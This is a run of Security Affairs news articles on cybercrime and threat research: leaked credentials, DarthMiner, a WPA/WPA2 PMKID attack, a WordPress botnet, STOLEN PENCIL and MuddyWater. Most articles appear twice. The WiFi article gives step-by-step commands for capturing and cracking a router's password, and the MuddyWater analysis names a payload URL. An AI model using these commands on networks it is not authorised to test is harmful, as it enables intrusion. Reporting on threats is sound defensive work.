According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers, keyloggers, such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from a malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from configuration files, databases, secret storages of more than 70 programs on the victim’s computer and then sends stolen information to cyber criminals’ C&C server. Another Trojan-stealer — AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallets data. Qbot worm gathers login credentials through use of keylogger, steals cookie files and certificates, active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin,head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks:  when, where and how exactly your data was compromised”.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, existing vulnerabilities across the world. These unique indicators allow to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents GIB-CERT experts contacted official CERTs in more than 30 countries and notified local incident response teams about data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.



Security Affairs

A new Mac malware combines a backdoor and a crypto-miner

Experts from Malwarebytes discovered a new strain of Mac malware, tracked as DarthMiner, that is a combination of two open-source programs. 

Experts from Malwarebytes discovered a new piece of Mac malware, tracked as DarthMiner, that is the combination of two open source tools.

The malware is distributed through Adobe Zii, an application supposedly helps in the piracy of various Adobe programs. In this case, attackers used a fake Adobe Zii software that was definitely not the real thing.

“Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.” reads the analysis published by MalwareBytes.

“The malware was being distributed through an application named Adobe Zii.”

The fake Adobe Zii application was developed to run a shell script that downloads and executes a Python script, and then downloads and runs an app named sample.app, that appears to be a version of Adobe Zii, most likely to appear as a harmless application. 

The Python script looks for the presence of Little Snitch, a commonly-used outgoing firewall, and halt the infection process if it is present.

Then the script opens a connection to an EmPyre backend that send arbitrary commands to a compromised Mac. Next, the backdoor downloads a script that fetches and installs the other components of the malware. The malware creates a launch agent named com.proxy.initialize.plist that keeps the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The malicious code also installs the XMRig cryptominer and creates a launch agent for it. 

The analysis of the code revealed another interesting feature, the code to download and install a root certificate for the mitmproxy tool.

“Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.” continues the analysis.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis,

“Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free,” Malwarebytes concludes.

Pierluigi Paganini

(Security Affairs – Mac malware, backdoor)

The post A new Mac malware combines a backdoor and a crypto-miner appeared first on Security Affairs.

Security Affairs: A new Mac malware combines a backdoor and a crypto-miner

Experts from Malwarebytes discovered a new strain of Mac malware, tracked as DarthMiner, that is a combination of two open-source programs. 

Experts from Malwarebytes discovered a new piece of Mac malware, tracked as DarthMiner, that is the combination of two open source tools.

The malware is distributed through Adobe Zii, an application supposedly helps in the piracy of various Adobe programs. In this case, attackers used a fake Adobe Zii software that was definitely not the real thing.

“Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.” reads the analysis published by MalwareBytes.

“The malware was being distributed through an application named Adobe Zii.”

The fake Adobe Zii application was developed to run a shell script that downloads and executes a Python script, and then downloads and runs an app named sample.app, that appears to be a version of Adobe Zii, most likely to appear as a harmless application. 

The Python script looks for the presence of Little Snitch, a commonly-used outgoing firewall, and halt the infection process if it is present.

Then the script opens a connection to an EmPyre backend that send arbitrary commands to a compromised Mac. Next, the backdoor downloads a script that fetches and installs the other components of the malware. The malware creates a launch agent named com.proxy.initialize.plist that keeps the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The malicious code also installs the XMRig cryptominer and creates a launch agent for it. 

The analysis of the code revealed another interesting feature, the code to download and install a root certificate for the mitmproxy tool.

“Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.” continues the analysis.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis,

“Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free,” Malwarebytes concludes.

Pierluigi Paganini

(Security Affairs – Mac malware, backdoor)

The post A new Mac malware combines a backdoor and a crypto-miner appeared first on Security Affairs.



Security Affairs

Security Affairs: Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

The British teenager George Duke-Cohan (19) has been sentenced to three years in prison due to false bomb threats and carrying out DDoS attacks.A

Cohan was arrested in August by the U.K. National Crime Agency (NCA), the teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” was arrested on August 31 and pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and a United Airlines flight traveling from the UK to San Francisco in August. in many cases resulting in evacuations. 
The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will face additional charges in the United States, even if the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow.” said Judge Richard Foster

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” Judge Richard Foster said, quoted by the Daily Mail. “What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.



Security Affairs

Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

The British teenager George Duke-Cohan (19) has been sentenced to three years in prison due to false bomb threats and carrying out DDoS attacks.A

Cohan was arrested in August by the U.K. National Crime Agency (NCA), the teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” was arrested on August 31 and pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and a United Airlines flight traveling from the UK to San Francisco in August. in many cases resulting in evacuations. 
The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will face additional charges in the United States, even if the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow.” said Judge Richard Foster

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” Judge Richard Foster said, quoted by the Daily Mail. “What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.

Security Affairs: Expert devised a new WiFi hack that works on WPA/WPA2

The popular expert Jens ‘Atom’ Steube devised a new WiFi hack that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

The attack technique works against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

Steube discovered the attack while he was analyzing the WPA3 security standard.

The technique allows an attacker to recover the Pre-shared Key (PSK) login passwords and use them to hack into your Wi-Fi network and eavesdrop on the Internet traffic.

wifi hack

Unlike other WiFi hacking techniques, this attack doesn’t require the capture of a full 4-way authentication handshake of EAPOL.

Instead, the new WiFi hack is performed on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”

“The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame”

The Robust Security Network protocol allows establishing secure communications over an 802.11 wireless network. It uses the PMKID key to establish a connection between a client and an access point.

Below the attack step by step:

Step 1 — Run hcxdumptool to request the PMKID from the Access Point and to dump the received frame to a file (in pcapng format).

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

Step 2 — Run hcxpcaptool tool to convert the captured data from pcapng format to a hash format that is accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Launch the Hashcat (v4.2.0 or higher) password cracking tool and crack it. The hash-mode that we need to use is 16800.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

In this way it is possible to retrieve the password of the target WiFi networt.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” 
Steube concludes.

“The main advantages of this attack are as follow:

  • No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string”.

Pierluigi Paganini

(Security Affairs – WiFi hack, hacking)

The post Expert devised a new WiFi hack that works on WPA/WPA2 appeared first on Security Affairs.



Security Affairs

Expert devised a new WiFi hack that works on WPA/WPA2

The popular expert Jens ‘Atom’ Steube devised a new WiFi hack that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

The attack technique works against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

Steube discovered the attack while he was analyzing the WPA3 security standard.

The technique allows an attacker to recover the Pre-shared Key (PSK) login passwords and use them to hack into your Wi-Fi network and eavesdrop on the Internet traffic.

wifi hack

Unlike other WiFi hacking techniques, this attack doesn’t require the capture of a full 4-way authentication handshake of EAPOL.

Instead, the new WiFi hack is performed on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”

“The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame”

The Robust Security Network protocol allows establishing secure communications over an 802.11 wireless network. It uses the PMKID key to establish a connection between a client and an access point.

Below the attack step by step:

Step 1 — Run hcxdumptool to request the PMKID from the Access Point and to dump the received frame to a file (in pcapng format).

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

Step 2 — Run hcxpcaptool tool to convert the captured data from pcapng format to a hash format that is accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Launch the Hashcat (v4.2.0 or higher) password cracking tool and crack it. The hash-mode that we need to use is 16800.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

In this way it is possible to retrieve the password of the target WiFi networt.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” 
Steube concludes.

“The main advantages of this attack are as follow:

  • No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string”.

Pierluigi Paganini

(Security Affairs – WiFi hack, hacking)

The post Expert devised a new WiFi hack that works on WPA/WPA2 appeared first on Security Affairs.

Hackers defaced Linux.org with DNS hijack

The Linux.org website was defaced last week via DNS hijack, attackers breached into associated registrar account and changed the DNS settings.

Attackers changed the defacement page a few times, they protested against the new Linux kernel developer code of conduct in a regrettable way with 
racial slurs and the image of an individual showing the anus.

linux.org-community-defacement

The defacement page also includes links and a Twitter account (@kitlol5) believed to be under the control of the attacker.

The person who was operating the Twitter account posted a screenshot showing that they had access to the Network Solutions account of Michelle McLagan, who evidently owns linux.org, and modified the DNS settings.

“This evening someone got into my partner’s netsol account and pointed linux.org DNS to their own cloudflare account. The production env (web / db) wasn’t touched. DNS was simply pointing to another box.” 
one of the Linux.org admins
wrote on Reddit.

“She’s working with netsol to prove ownership, etc.. and we’re hoping things will be cleared up in the morning.”

The hacker did not access the servers hosting Linux.org and user data were not compromised.

How to prevent this kind of incident?

Administrators should enable multi-factor authentication (MFA) for their account.

“I think it was a combination of public whois info and no MFA that lead to this,” added the Linux.org admin.

“There’s always one thing – they found the weakest link and exploited it.”

After the incident, admins have enabled MFA on all accounts.

Pierluigi Paganini

(Security Affairs – DNS hijack, hacking)

The post Hackers defaced Linux.org with DNS hijack appeared first on Security Affairs.

WordPress botnet composed of +20k installs targets other sites

Experts from security firm Wordfence discovered a Botnet of 20,000 WordPress Sites Infecting other WordPress installs.

Experts from security firm Wordfence uncovered a botnet composed of over 20,000 WordPress sites that is being used to compromise other websites running on the popular CMS and recruit them.  

“The threat actors (hackers) use a group of four command and control (C2) servers to send requests to over 14,000 proxy servers provided by a Russian proxy provider called best-proxies[.]ru.” reads the analysis published by WordFence.

“They use these proxies to anonymize the C2 traffic. The requests pass through the proxy servers and are sent to over 20,000 infected WordPress sites. Those sites are running an attack script which attacks targeted WordPress sites.”

The botnet is used by attackers to carry out brute force attacks against other WordPress sites, according to Wordfence Defiant Threat Intelligence team, the botnet has already generated over 5 million authentication requests. The botnet attempts XML-RPC authentication to other WordPress sites in order to access privileged accounts.

The XML-RPC interface allows users to remotely post content to a WordPress site using the WordPress or other APIs, it is located in the root directory of a WordPress install at the xmlrpc.php file.

Unfortunately, the XML-RPC interface doesn’t implement a rate limiting on the number of API requests that it is possible to submit, a gift for brute-force attackers. 

A close look at the malicious infrastructure allowed the experts to discover that hackers used four command and control servers that issue commands to the bots through proxy servers at the Russian Best-Proxies.ru service.  Experts identified over 14,000 proxy servers used by the botmaster to anonymize the traffic.

Once a WordPress site is compromised it will start carrying out brute force attacks against the XML-RPC interface of other websites. 

“We also noted that the User-Agent strings associated with these requests matched those used by applications commonly seen interacting with the XML-RPC interface, like wp-iphone and wp-android,” continues the analysis.

“Since these applications typically store credentials locally, it was unusual to see a significant amount of failed logins from them, which drew our attention. We identified over 20,000 WordPress slave sites that were attacking other WordPress sites.”

Brute force scripts used by the attackers accept POST input from the C2 servers, the request includes domains to target and word lists to use when performing the brute force attacks.

It is also possible to use new wordlists by providing URL to the script.

Wordfence reported its discovery to the authorities and is helping them to dismantle the WordPress botnet.

Pierluigi Paganini

(Security Affairs –WordPress Botnet, hacking)

The post WordPress botnet composed of +20k installs targets other sites appeared first on Security Affairs.

Security Affairs: WordPress botnet composed of +20k installs targets other sites

Experts from security firm Wordfence discovered a Botnet of 20,000 WordPress Sites Infecting other WordPress installs.

Experts from security firm Wordfence uncovered a botnet composed of over 20,000 WordPress sites that is being used to compromise other websites running on the popular CMS and recruit them.  

“The threat actors (hackers) use a group of four command and control (C2) servers to send requests to over 14,000 proxy servers provided by a Russian proxy provider called best-proxies[.]ru.” reads the analysis published by WordFence.

“They use these proxies to anonymize the C2 traffic. The requests pass through the proxy servers and are sent to over 20,000 infected WordPress sites. Those sites are running an attack script which attacks targeted WordPress sites.”

The botnet is used by attackers to carry out brute force attacks against other WordPress sites, according to Wordfence Defiant Threat Intelligence team, the botnet has already generated over 5 million authentication requests. The botnet attempts XML-RPC authentication to other WordPress sites in order to access privileged accounts.

The XML-RPC interface allows users to remotely post content to a WordPress site using the WordPress or other APIs, it is located in the root directory of a WordPress install at the xmlrpc.php file.

Unfortunately, the XML-RPC interface doesn’t implement a rate limiting on the number of API requests that it is possible to submit, a gift for brute-force attackers. 

A close look at the malicious infrastructure allowed the experts to discover that hackers used four command and control servers that issue commands to the bots through proxy servers at the Russian Best-Proxies.ru service.  Experts identified over 14,000 proxy servers used by the botmaster to anonymize the traffic.

Once a WordPress site is compromised it will start carrying out brute force attacks against the XML-RPC interface of other websites. 

“We also noted that the User-Agent strings associated with these requests matched those used by applications commonly seen interacting with the XML-RPC interface, like wp-iphone and wp-android,” continues the analysis.

“Since these applications typically store credentials locally, it was unusual to see a significant amount of failed logins from them, which drew our attention. We identified over 20,000 WordPress slave sites that were attacking other WordPress sites.”

Brute force scripts used by the attackers accept POST input from the C2 servers, the request includes domains to target and word lists to use when performing the brute force attacks.

It is also possible to use new wordlists by providing URL to the script.

Wordfence reported its discovery to the authorities and is helping them to dismantle the WordPress botnet.

Pierluigi Paganini

(Security Affairs –WordPress Botnet, hacking)

The post WordPress botnet composed of +20k installs targets other sites appeared first on Security Affairs.



Security Affairs

Security Affairs: STOLEN PENCIL campaign, hackers target academic institutions.

STOLEN PENCIL campaign – North Korea-linked APT group has been targeting academic institutions since at least May of this year.

North Korea-linked threat actors are targeting academic institutions with spear phishing attacks. The phishing messages include a link to a website where a decoy document that attempts to trick users into installing a malicious Google Chrome extension. 
Many of the victims of this campaign, tracked as STOLEN PENCIL, were at multiple universities had expertise in biomedical engineering. 

Attackers ensure persistence using off-the-shelf tools, but according to NetScout they had poor OPSEC (i.e. Korean keyboards, open web browsers in Korean, English-to-Korean translators).

“The ultimate motivation behind the attacks is unclear, but the threat actors are adept at scavenging for credentials. Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension.” reads the analysis published by the experts.

“Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access.”

Threat actors used many basic phishing pages, the more sophisticated of them targeted academia display a benign PDF in an IFRAME and redirected users to a “Font Manager” extension from the Chrome Web Store.

The malicious extension loads JavaScript from a separate site, experts only found a file containing legitimate jQuery code, likely because the threat actors replaced the malicious code to make hard the analysis. The malicious extension allows the attacker to read data from all the websites accessed by the victim, a circumstance that suggests attackers were looking to steal browser cookies and passwords. 

Experts pointed out that the attackers did not use a malware to compromise the targets, the STOLEN PENCIL attackers employed RDP to access the compromised systems, researchers observed remote access occurring daily from 06:00 to 09:00 UTC (01:00-04:00 EST).

STOLEN PENCIL attackers also used a compromised or stolen certificate to sign several PE files used in the campaign. The researchers observed two signed sets of tools, dubbed MECHANICAL and GREASE. The former logs keystrokes and replaces an Ethereum wallet address with the attackers’ ones, the latter adds a Windows administrator account to the system and would also enable RDP.

The security researchers also discovered a ZIP archive containing tools for port scanning, memory and password dumping, and other hacking activities. The list of the tools include KPortScan, PsExec, batch files for enabling RDP, Procdump, Mimikatz, the Eternal suite of exploits, and Nirsoft tools such as Mail PassView, Network Password Recovery, Remote Desktop PassView, SniffPass, and WebBrowserPassView.

The STOLEN PENCIL campaign likely represents only a small set of the threat actor’s activity. The use of basic techniques, off-the-shelf programs, the aforementioned cryptojacker, and the use of Korean language suggests the actor is of North Korean origin, the security researchers say. 

“While we were able to gain insight into the threat actor’s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity. Their techniques are relatively basic, and much of their toolset consists of off-the-shelf programs and living off the land. ” NetScout concludes. 

“This, along with the presence of the cryptojacker, is typical of DPRK tradecraft.  Additionally, the operators’ poor OPSEC exposes their Korean language, in both viewed websites and keyboard selections.” 

Pierluigi Paganini

(Security Affairs – STOLEN PENCIL, hacking)

The post STOLEN PENCIL campaign, hackers target academic institutions. appeared first on Security Affairs.



Security Affairs

STOLEN PENCIL campaign, hackers target academic institutions.

STOLEN PENCIL campaign – North Korea-linked APT group has been targeting academic institutions since at least May of this year.

North Korea-linked threat actors are targeting academic institutions with spear phishing attacks. The phishing messages include a link to a website where a decoy document that attempts to trick users into installing a malicious Google Chrome extension. 
Many of the victims of this campaign, tracked as STOLEN PENCIL, were at multiple universities had expertise in biomedical engineering. 

Attackers ensure persistence using off-the-shelf tools, but according to NetScout they had poor OPSEC (i.e. Korean keyboards, open web browsers in Korean, English-to-Korean translators).

“The ultimate motivation behind the attacks is unclear, but the threat actors are adept at scavenging for credentials. Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension.” reads the analysis published by the experts.

“Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access.”

Threat actors used many basic phishing pages, the more sophisticated of them targeted academia display a benign PDF in an IFRAME and redirected users to a “Font Manager” extension from the Chrome Web Store.

The malicious extension loads JavaScript from a separate site, experts only found a file containing legitimate jQuery code, likely because the threat actors replaced the malicious code to make hard the analysis. The malicious extension allows the attacker to read data from all the websites accessed by the victim, a circumstance that suggests attackers were looking to steal browser cookies and passwords. 

Experts pointed out that the attackers did not use a malware to compromise the targets, the STOLEN PENCIL attackers employed RDP to access the compromised systems, researchers observed remote access occurring daily from 06:00 to 09:00 UTC (01:00-04:00 EST).

STOLEN PENCIL attackers also used a compromised or stolen certificate to sign several PE files used in the campaign. The researchers observed two signed sets of tools, dubbed MECHANICAL and GREASE. The former logs keystrokes and replaces an Ethereum wallet address with the attackers’ ones, the latter adds a Windows administrator account to the system and would also enable RDP.

The security researchers also discovered a ZIP archive containing tools for port scanning, memory and password dumping, and other hacking activities. The list of the tools include KPortScan, PsExec, batch files for enabling RDP, Procdump, Mimikatz, the Eternal suite of exploits, and Nirsoft tools such as Mail PassView, Network Password Recovery, Remote Desktop PassView, SniffPass, and WebBrowserPassView.

The STOLEN PENCIL campaign likely represents only a small set of the threat actor’s activity. The use of basic techniques, off-the-shelf programs, the aforementioned cryptojacker, and the use of Korean language suggests the actor is of North Korean origin, the security researchers say. 

“While we were able to gain insight into the threat actor’s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity. Their techniques are relatively basic, and much of their toolset consists of off-the-shelf programs and living off the land. ” NetScout concludes. 

“This, along with the presence of the cryptojacker, is typical of DPRK tradecraft.  Additionally, the operators’ poor OPSEC exposes their Korean language, in both viewed websites and keyboard selections.” 

Pierluigi Paganini

(Security Affairs – STOLEN PENCIL, hacking)

The post STOLEN PENCIL campaign, hackers target academic institutions. appeared first on Security Affairs.

Europol identified 1504 money mules under EMMA 4 operation

Europol announced the arrest of 168 people under the 
European Money Mule Action ‘EMMA 4′, a massive operation that resulted in the identification of 1,504 money mules. 

Europol announced that 168 people have been arrested under the ‘EMMA 4’, an international operation conducted by law enforcement. EMMA 4 lasted from September to November 2018. Law enforcement in 30 states identified 140 money mule organizers. 

Europol opened 837 criminal investigations, many of which are still ongoing, law enforcement arrested people in 20 states, 
The operation sees the participation of Europol, Eurojust, the European Banking Federation, and law enforcement from Austria, Belgium, Bulgaria, Croatia, Czech Republic, Denmark, Estonia, Finland, France, Greece, Germany, Hungary, Ireland, Italy, Latvia, Lithuania, Malta, Netherlands, Poland, Portugal, Romania, Slovenia, Spain, Sweden, Australia, Moldova, Norway, Switzerland, the United Kingdom and the United States.

The operation aimed at dismantling money laundering activities, in particular tackling ‘money mules’ rings that have e crucial role in the criminal activity. Global and European banks provided an essential support to the EMMA 4, Europol reported the participation of over 300 banks, 20 bank associations, and other financial institutions. The financial organization helped reporting 26,376 fraudulent money mule transactions, preventing a total loss of €36.1 million ($41.1 million). 

Money mules are essential for cash out of criminal activities and transfer stolen funds between accounts used to launder the money.

“Money mules are individuals who, often unwittingly, have been recruited by criminal organisations as money laundering agents to hide the origin of ill-gotten money.” reads the press release published by Europol.

“Tricked by the promise of easy money, mules transfer stolen funds between accounts, often in different States, on behalf of others and are usually offered a share of the funds that pass through their own accounts.”

Criminal organizations use to choose money moles among newcomers to a country or people who are unemployed or in economic distress. Unfortunately, the number of young people recruited as money mules is increasing, criminals are reaching them through social media, advertisement of fake jobs or get-rich-quick posts.

Youngsters have no perception of the crime they are carrying out transferring funds from an account to another.

“To raise awareness of this type of fraud, the money muling awareness campaign #DontBeAMule kicks off today across Europe. With awareness-raising material, available for download in 25 languages, the campaign will inform the public about how these criminals operate, how they can protect themselves and what to do if they become a victim.” concludes the press release.

“For the next week, international partners from law enforcement and judicial authorities, together with financial institutions, will be supporting the campaign at national level.”

Pierluigi Paganini

(Security Affairs –money mules, EMMA 4)

The post Europol identified 1504 money mules under EMMA 4 operation appeared first on Security Affairs.

Security Affairs: Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater Infection Chain observed in a last wave of cyber attacks.

Introduction

At the end of November, some Middle East countries have been targeted by a new wave of attacks related to the Iranian APT group known as “MuddyWater“: their first campaign was observed back in 2017 and more recently Unit42 researchers reported attacks in the ME area. The MuddyWater’s TTPs seem to be quite invariant during this time-period: they keep using spear-phishing emails containing blurred document in order to induce the target to enable the execution of VB-macro code, to infect the host with POWERSTAT malware.

Figure 1. Malicious document

According to the analysis of ClearSky Research Team and TrendMicro researchers, at the end of November, MuddyWater group hit Lebanon and Oman institutions and after a few days Turkish entities. The attack vector and the final payload of were the same: the usual macro-embedded document and the POWERSTAT backdoor respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi-Cybaze Zlab researchers analyzed the file “Cv.doc”, the blurred resume used by MuddyWater during their Lebanon/Oman campaign.

Technical Analysis

When the victim enables the MACRO execution, the malicious code creates an Excel document containing the necessary code to download the next-stage of the malicious implant. At the same time, it shows a fake error popup saying the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before the execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed into the new Excel downloads powershell code from an URL apparently referencing a PNG image file “http://pazazta[.]com/app/icon.png”. The downloaded payload is able to create three new local files:

  • C:\Windows\Temp\temp.jpg, containing Javascript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.
Figure 5. Downloaded Powershell code

As shown in the above figure, the first file to be executed is “Windows.vbe” which simply run the Javascript code contained into temp.jpg, using the CSCRIPT engine. After its decryption, it is possible to notice the JS purpose: delay the execution of another powershell payload.

Figure 6. Javascript code within “temp.jpg”

